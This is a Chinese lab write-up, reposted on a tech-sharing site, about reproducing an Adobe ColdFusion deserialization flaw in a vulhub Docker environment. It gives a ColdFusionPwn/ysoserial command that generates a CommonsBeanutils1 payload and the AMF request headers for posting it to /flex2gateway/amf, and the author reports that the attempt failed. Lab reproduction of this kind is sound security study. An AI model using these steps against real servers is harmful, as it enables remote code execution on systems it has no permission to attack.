标签：Adobe ColdFusion Accept amf Content docker 序列化

Adobe ColdFusion 反序列化漏洞

0x01.环境搭建

利用vulhub搭建漏洞环境

service docker start
docker-compose up -d

查看开启的端口号

docker-compose ps

访问http://target_ip:8500/CFIDE/administrator/index.cfm

输入密码vulhub，即可成功安装Adobe ColdFusion

0x02.漏洞复现

我们使用ColdFusionPwn工具来生成POC

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

我执行的时候出现了这样的错误，但kali上可以生成payload

使用past from file来给burp添加payload

文件头如下，要用Content-Type: application/x-amf

POST /flex2gateway/amf HTTP/1.1
Host: target_ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

[...poc...]

但结果是失败的，总是无法执行命令，希望有大佬解惑

标签：Adobe,ColdFusion,Accept,amf,Content,docker,序列化
来源： https://www.cnblogs.com/-Anguvia-/p/14615796.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。